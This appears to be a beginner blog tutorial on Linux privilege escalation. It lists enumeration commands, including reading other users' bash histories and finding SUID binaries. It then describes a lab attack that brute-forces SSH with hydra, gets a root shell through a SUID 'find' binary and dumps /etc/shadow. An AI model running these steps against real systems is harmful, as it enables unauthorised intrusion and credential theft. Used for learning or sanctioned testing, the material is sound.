Basic privilege esculation for newbi

When we first gain access to a Linux box there is a good chance that we have gotten a low level account. The next step is usually to escalate our privileges (give us access to more than we have now) up so we can view things like the shadow file. Or maybe there are certain tool we want to run to attack another system and need to be root to run these tools.

I wanted to give some idea of commands we can run to get information that may help us to escalate our privileges and then give really basic example to show what I mean.

[b]Who are you?[/b]
Linux Command: id

[b]Where are you?[/b]
pwd

[b]What version of Linux is running?[/b]
uname -a

[b]What can you do?[/b]
sudo -l

[b]Find all files and directories that are owned by you[/b]
find / -user `whoami` -ls 2> /dev/null

[b]List (running) processes/cronjobs[/b]
ps aux
cat /etc/crontab
crontab -e
ls -R /etc/periodic/

[b]List Listeners/Sockets/Open files in general[/b]
lsof -i
netstat -an

[b]List users & groups[/b]
cat /etc/passwd
cat /etc/groups

[b]Find SUID/SGID binaries[/b]
find / \( -perm -2000 -or -perm -4000 \) -ls 2> /dev/null

[b]Find files that have been accessed/modified/changed recently (e.g. in past 60 Minutes)[/b]
find / -type f -amin 60 -ls 2> /dev/null
find / -type f -mmin 60 -ls 2> /dev/null
find / -type f -cmin 60 -ls 2> /dev/null

[b]List files in /tmp[/b]
ls -al /tmp/

[b]See logfiles in /var/log[/b]
ls -al /var/log

[b]Read other users’ bash history[/b]
cat /home/*/.bash_history

[b]Find files with interesting extensions[/b]
find / -name “*.cfg” -or -name “*.config” -or -name “*.txt” -ls 2> /dev/null

[b]Basic Example of usage:[/b]
We have been given a box to pen testing so we have taken the same process as most pen testing and done information gathering and run nmap scans.

[list]
[li]The only two ports that are open are 80 and 22 [/li]
[li]We use Firefox to see if there any web page.[/li]
[li]We find there is a pretty simple web page that contains some information including email address.[/li]
[li]We then take these email address and produce a user list to use with hydra to brute force the ssh.[/li]
[li]After around 5 mins we get the username as john and passwords as password123.[/li]
[li]We then ssh into the box as the john using his password.[/li]
[li]We now want to try escalate our privileges so we can dump the shadow file and try to crack the other users password.[/li]
[li]We start with our basic privilege list above until we run find / \( -perm -2000 -or -perm -4000 \) -ls 2> /dev/null this tells us that the find command is running at suid[/li]
[li]We can use this to get a root shell by running find . -exec /bin/sh\; this will give us a euid of 0 meaning root.[/li]
[li]We can now use this to cat the /etc/shadow or ant other root task we want to complete on the box.[/li]
[/list]

Please note this very basic example and depending on the system we may not want dump the hashes. I have just used this as its a very simple concept to explain.

Recommended Reading:
https://en.wikipedia.org/wiki/Setuid
https://en.wikipedia.org/wiki/User_identifier
http://g0tmi1k.blogspot.co.uk/2011/08/basic-linux-privilege-escalation.html

Leave a Reply